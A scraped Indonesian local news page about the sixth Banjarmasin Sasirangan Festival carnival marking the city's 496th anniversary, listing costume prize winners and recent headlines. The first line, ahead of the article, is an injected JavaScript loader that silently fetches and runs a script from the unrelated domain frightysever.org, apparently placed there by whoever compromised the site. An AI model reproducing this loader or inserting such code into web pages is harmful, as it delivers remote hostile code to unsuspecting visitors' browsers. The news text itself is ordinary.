(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Ribuan Peserta Meriahkan Karnaval BSF ke-6 Semarakan Harjad Banjarmasin ke-496


KANALKALIMANTAN.COM, BANJARMASIN – Parade Banjarmasin Sasirangan Festival (BSF) ke-6 tutup rangkaian peringatan Hari Jadi Kota Banjarmasin ke-496 pada Sabtu (1/10/2022). Kegiatan ini diikuti ribuan peserta.

Karnaval yang dibuka langsung oleh Wali Kota Banjarmasin Ibnu Sina di halaman Pemko Banjarmasin Jl. Martadinata tersebut diikuti oleh seluruh SKPD, siswa-siswi SMP, dan juga masyarakat umum.

Berbagai kostum dan aksesoris digunakan oleh para peserta karnaval dari pakaian adat tradisional Banjar hingga kostum ikon Banjarmasin.

 

Baca juga : Tambal Sulam Bertahun-tahun, Warga Bosan Menanti Perbaikan Titian di Pulau Bromo

“Tadi saya melihat ada bermacam-macam kreasi dan kreativitas, ada jukung ada gerbang pintu masuk KM 6, dan ada menara pandang,” ucap Ibnu Sina.

Ibnu Sina sangat mengapresiasi para masyarakat yang ikut serta dalam karnaval yang mengangkat derajat kain Sasaringan tersebut dan mengajak untuk mencintai sasirangan.

“Kita harus bangga basasirangan, kita harus cinta sasirangan sesuai dengan gerakan nasional, bangga buatan Indonesia,” katanya.

Kegiatan karnaval BSF kw-6 2022 tersebut diawali dengan pawai berjalan kaki mengelilingi kota Banjarmasin dari Siring Balai Kota Banjarmasin.

 

Baca juga  : Pertamina Turunkan Harga BBM Jenis Pertamax Per-1 Oktober

Pada kegiatan karnaval Sasirangan tersebut juga diberikan hadiah kepada para peserta yang terpilih berdasarkan penilaian dewan juri berdasarkan penialian kostum hingga nilai kearifan lokal.

Pada kategori kostum peserta dengan nilai tertinggi 355 nomor peserta 16 Mamah Bungas, juara terbaik 2 ARM Project, dan juara terbaik 3 SMPN 7 Banjarmasin.

Sementara itu untuk juara harapan 1 kategori  kostum atas nama Tinggle One, juara harapan 2 atas nama Barikit, dan Juara harapan 3 atas nama Abhinaya Team. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : cell


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

6 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

6 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

6 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

7 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

7 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

7 jam ago

This website uses cookies.